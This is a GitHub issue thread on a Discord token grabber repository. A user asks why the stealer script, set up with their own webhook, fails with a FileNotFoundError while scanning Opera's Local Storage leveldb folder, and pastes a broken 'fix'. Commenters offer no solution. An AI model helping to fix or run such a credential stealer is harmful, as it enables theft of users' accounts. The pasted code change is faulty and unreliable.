Discord-Token-Grabber icon indicating copy to clipboard operation
Discord-Token-Grabber copied to clipboard

Script Fails to Run

Open Kiwifuit opened this issue 3 years ago • 3 comments

Hello

I copied the contents of the file and changed the WEBHOOK_URL variable into the webhook that I made. I also changed the PING_ME variable to True.

When I run the script, it gives me a FileNotFound error, so I tried to fix it by adding or FileNotFoundError in Line 45 so it looks like this:

    for platform, path in paths.items():
        if not os.path.exists(path) or FileNotFoundError:
            continue

All it did was ping me. It did not give me the error.

Error Message (full):

Traceback (most recent call last):
  File "c:\Users\Kiwifruit\Documents\Scripts\Python\Console-Based\TokenGrabber\main.py", line 74, in <module>
    main()
  File "c:\Users\Kiwifruit\Documents\Scripts\Python\Console-Based\TokenGrabber\main.py", line 50, in main
    tokens = find_tokens(path)
  File "c:\Users\Kiwifruit\Documents\Scripts\Python\Console-Based\TokenGrabber\main.py", line 18, in find_tokens
    for file_name in os.listdir(path):
FileNotFoundError: [WinError 3] The system cannot find the path specified: 'C:\\Users\\Kiwifruit\\AppData\\Roaming\\Opera Software\\Opera Stable\\Local Storage\\leveldb'

Any way to fix this?

Kiwifuit avatar May 09 '21 04:05 Kiwifuit

yup

dragneel7xx avatar Dec 22 '21 04:12 dragneel7xx

yup

love how you say "yup" and not say how lol

ueahf avatar Mar 26 '22 02:03 ueahf

lmao

Kiwifuit avatar Mar 29 '22 00:03 Kiwifuit